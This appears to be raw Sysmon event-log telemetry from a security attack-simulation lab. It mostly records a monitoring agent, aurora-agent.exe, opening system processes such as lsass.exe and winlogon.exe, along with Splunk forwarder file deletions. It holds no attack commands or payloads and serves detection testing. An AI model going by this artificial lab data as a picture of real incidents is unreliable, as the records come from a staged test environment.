Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016504Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016503Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.755{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016502Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.750{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016501Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.749{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016500Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016499Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.742{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016498Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016497Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016496Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016495Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.714{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016494Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.712{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016493Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016492Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.702{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016491Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.685{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016490Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.676{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016489Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.667{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000016488Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.659{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A30DE0110C13ADA96469126CF327B3,SHA256=05EFA45032284C1DF74B4F424EA2E72A43618501E9E5A1C06F96C0B9F018811F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016487Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.655{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016486Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.647{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016485Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.598{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016484Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.591{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016483Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.585{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016482Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.575{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016481Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.562{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016480Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016479Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.545{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016478Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.543{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000016510Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:03.619{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E624B223A1E010EB533A2DC5DD2165,SHA256=4BF5A9AE6C4BD01638981EBB05EB92F94F519EF1F6012F4804F7E2816ED448EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:01.699{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56298-false10.0.1.12-8000- 23542300x800000000000000041853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:03.078{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77772690ECB289872A8DAD83D6CF0522,SHA256=098ECDE53344EC97AC15D8052254DF1FBD07FF24C6FF71818192A68FBFC246BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016512Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:04.707{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A3614B7CC8FE06CB994650390CFEF8E,SHA256=E8BC4F6DE0F4065DC8029E407498105019F99C751AB4BC6B1A2548126711CD8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:04.191{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8DE50D805013C5B6177725FC9950FB7,SHA256=6B03E787056EAD6CDAB8EAE590BBFE4742D44F615C048B98E364E3C141007BB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016511Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:04.056{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016513Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:05.775{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65DF07B529E26ED48F7CF24BFA1FC6A7,SHA256=F6FF468BA6C47BB4225332797703AE2E69191B0151B67A11FDF2E69C482AA305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:05.269{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 